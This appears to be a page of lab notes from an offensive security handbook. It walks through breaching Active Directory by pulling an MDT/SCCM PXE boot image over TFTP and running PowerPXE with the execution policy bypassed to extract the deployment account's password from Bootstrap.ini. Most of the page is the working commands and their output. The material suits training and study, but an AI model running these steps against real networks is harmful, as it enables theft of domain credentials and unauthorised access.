handbook/tools/5.Machine/3.Active-Directory/General/Exploitation/2.Breaching-AD/4.MDT-and-SCCM-PXE-Boot-Image.md
2024-08-31 01:07:22 +02:00

4 KiB

General

MDT (Microsoft Deployment Toolkit) and SCCM (System Center Configuration Manager) are tools that are used to deploy and manage operating systems, applications, and other software in a network environment. A PXE (Preboot eXecution Environment) boot image is a type of boot image that is used to boot a computer over the network and perform various tasks, such as installing an operating system.

An attacker may attempt to exploit MDT or SCCM by compromising the PXE boot image and using it to gain unauthorized access to a system. For example, an attacker could modify the PXE boot image to include malicious code or to redirect the computer to a rogue server. If the attacker is successful, they may be able to gain access to the system and potentially compromise it.

Commands

PXE Boot Image Retrieval

Discover the DHCP IP (To find the PXE boot server)

nmap -sU -p 67 --script=dhcp-discover <network_range>
'---> Network Range ---> /16 /24...

DHCP Explaination Dynamic Host Configuration Protocol (DHCP) is a network protocol that is used to enable automatic assignment of IP addresses and other related network configuration parameters to devices on a network. The DHCP server maintains a pool of available IP addresses and assigns them to devices on the network as needed. This helps to simplify network configuration and management, as it allows devices to be connected to the network without the need to manually configure their network settings.

Discover the PXEboot Server (On powershell | Need a windows machine in local network)

nslookup   ---> This will start the nslookup utility

set type=ptr
_pxe._tcp.IP_OF_DHCP_PREVIOUSLY_DISCOVER Replace

# If the DHCP server is configured to provide the PXE server's hostname or IP address, `nslookup` will display the result of the query. The output will show the hostname or IP address of the PXE server.

Access the webserver

To ensure that all users of the network can use SSH, start by creating a folder with your username and copying the powerpxe repo into this folder:

SSH Command Prompt (Create directory)

C:\Users\THM>cd Documents
C:\Users\THM\Documents> mkdir <username>
C:\Users\THM\Documents> copy C:\powerpxe <username>\
C:\Users\THM\Documents\> cd <username>

Downloading our BCD file to read the configuration of the MDT server (Powershell)

C:\Users\THM\Documents\USER> tftp -i <MDT_IP> GET "\Tmp\x64{39...28}.bcd" conf.bcd
  • You will have to lookup THMMDT IP with nslookup mdt.x.something.com.

With the BCD file now recovered, we will be using powerpxe to read its contents.

More about Powerpxe Powerpxe is a PowerShell script that automatically performs this type of attack but usually with varying results, so it is better to perform a manual approach. We will use the Get-WimFile function of powerpxe to recover the locations of the PXE Boot images from the BCD file:

Execute Powerpxe (Note that you need to import that powershell script on the machine)

powershell -executionpolicy bypass

Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : <PXE Boot Image Location>
<PXE Boot Image Location>

WIM files are bootable images in the Windows Imaging Format (WIM). Now that we have the location of the PXE Boot image, we can again use TFTP to download this image:

PS C:\Users\THM\Documents\am0> tftp -i <MDT IP> GET "<PXE Boot Image Location>" pxeboot.wim

Recovering Credentials from a PXE Boot Image

Exfiltrate stored credentials

Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = <account>
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = <password>